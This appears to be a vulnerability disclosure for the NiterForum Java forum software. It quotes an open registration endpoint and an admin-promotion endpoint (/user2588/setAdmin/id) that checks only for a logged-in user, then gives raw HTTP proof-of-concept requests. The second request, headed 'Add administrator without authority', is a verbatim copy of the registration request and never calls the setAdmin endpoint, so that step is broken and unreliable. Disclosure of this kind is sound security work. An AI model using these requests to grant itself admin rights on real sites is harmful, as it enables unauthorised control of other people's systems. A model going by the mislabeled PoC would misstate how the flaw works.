There is a vulnerability that can add the administrator account

[nekoCCC]

Vulnerability Details

Any registered user

code:
/NiterForum/src/main/java/cn/niter/forum/api/SsoApi.java row68-83：

    @ResponseBody//@ResponseBody返回json格式的数据
    @RequestMapping(value = "/register", method = RequestMethod.POST)
    public Object register(HttpServletRequest request,
                        @RequestParam("name") String name,
                        @RequestParam("password") String password,
                        @RequestParam("type") Integer type,
                        HttpServletResponse response) {
        //1为手机号，2为邮箱号
        ResultDTO resultDTO = (ResultDTO)userService.register(type,name,password);
        if(200==resultDTO.getCode()){
            Cookie cookie = cookieUtils.getCookie("token",""+resultDTO.getData(),86400*3);
            response.addCookie(cookie);
        }
        return resultDTO;
    }

Any user can add users through this interface

return：
{"typ":"JWT","alg":"HS256"}{"vipRank":0,"avatarUrl":"/images/avatar/8.jpg","groupId":1,"iss":"NiterUser","name":"邮箱用户_h5ith","id":776,"exp":1661850834}
query database，successfully added：

Add administrator without authority

at
NiterForum/src/main/java/cn/niter/forum/controller/AdminController.java row 113-136：

    @PostMapping("/user2588/setAdmin/id")
    @ResponseBody
    public Map<String,Object> setQuestionById(HttpServletRequest request,
                                              @RequestParam(name = "id",defaultValue = "0") Long id) {

        UserDTO user = (UserDTO)request.getAttribute("loginUser");
        //UserAccount userAccount = (UserAccount) request.getSession().getAttribute("userAccount");
        if (user == null) {
            throw new CustomizeException(CustomizeErrorCode.NO_LOGIN);
        }
        Map<String,Object> map  = new HashMap<>();
        UserAccount userAccount = new UserAccount();
        userAccount.setGroupId(19);
        UserAccountExample userAccountExample = new UserAccountExample();
        userAccountExample.createCriteria().andUserIdEqualTo(id);
        if(userAccountMapper.updateByExampleSelective(userAccount,userAccountExample)==1){
            map.put("code",200);
            map.put("message","恭喜您，设置成功！");
        }
        return map;

    }
}

This interface does not perform permission verification, and any user can access it after logging in.

POC:

Any registered user

POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

name=[email protected]&password=123456&type=2

Add administrator without authority

POST /api/sso/register HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Origin: http://127.0.0.1:8080
Connection: close
Referer: http://127.0.0.1:8080/sso/register
Cookie:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

name=[email protected]&password=123456&type=2